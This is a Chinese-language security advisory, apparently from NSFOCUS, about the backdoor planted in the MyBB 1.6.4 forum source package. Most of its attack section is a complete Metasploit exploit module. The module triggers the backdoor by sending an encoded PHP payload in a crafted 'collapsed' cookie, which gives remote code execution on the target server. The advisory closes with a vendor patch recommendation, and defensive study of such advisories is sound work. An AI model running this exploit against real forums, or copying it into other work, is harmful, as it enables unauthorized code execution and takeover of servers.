安全研究
安全漏洞
MyBB受控源软件包后门安全漏洞
发布日期:2011-10-06
更新日期:2011-10-06
受影响系统:
MyBB MyBB 1.x描述:
BUGTRAQ ID: 49993
MyBB是一款流行的Web论坛程序。
MyBB源代码软件包被植入了后门,可被利用执行任意PHP代码。
2011年10月6日之前发布的受控源文件受到影响。
<*来源:vendor
链接:http://blog.mybb.com/wp-content/uploads/2011/10/mybb_1604_patches.txt
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.exploit-db.com/download/17949
##
# $Id: mybb_backdoor.rb 13838 2011-10-09 03:22:07Z todb $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'myBB 1.6.4 Backdoor Exploit',
'Description' => %q{
myBB is a popular open source PHP forum software. Version 1.6.4 contained an
unauthorized backdoor, distributed as part of the vendor's source package.
},
'Author' =>
[
'tdz',
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 13838 $',
'References' =>
[
[ 'BID', '49993' ],
[ 'SECUNIA', '46300' ],
[ 'URL', 'http://blog.mybb.com/2011/10/06/1-6-4-security-vulnerabilit/' ]
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Payload' =>
{
'Space' => 4000,
'DisableNops' => true,
'Keys' => ['php'],
},
'Targets' => [ ['Automatic', { }], ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 06 2011'
))
register_options(
[
OptString.new('URI', [ true, "myBB path", '/index.php']),
], self.class)
end
def uri
datastore['URI']
end
def check
print_status("Checking target")
res = send_request_raw(
{'method' => 'GET',
'uri' => uri},
10
)
if (not res) or (not res.code.between?(200,299))
return Exploit::CheckCode::Safe
else
return Exploit::CheckCoke::Detected
end
end
def exploit
print_status("Sending exploit request")
# See the patch at http://blog.mybb.com/wp-content/uploads/2011/10/mybb_1604_patches.txt
# for details of the backdoor mechanism.
cookie = "collapsed=0|1|2|3|4|5|6|7|8|9|10|11|12|13|14|15|16|17|18|19|20|21|22|"
cookie << Rex::Text.uri_encode(payload.encoded)
response = send_request_raw({
'method' => 'GET',
'global' => true,
'uri' => uri,
'headers' =>
{
'Cookie' => cookie,
}
},10)
if (not response) or (not response.code.between?(200,299))
print_error "Cannot connect to #{uri} on #{datastore['RHOST']}, got #{response ? response.code : 'no response'}."
else
handler
end
end
end
建议:
厂商补丁:
MyBB
----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.mybboard.com/
浏览次数:2275
严重程度:0(网友投票)
绿盟科技给您安全的保障
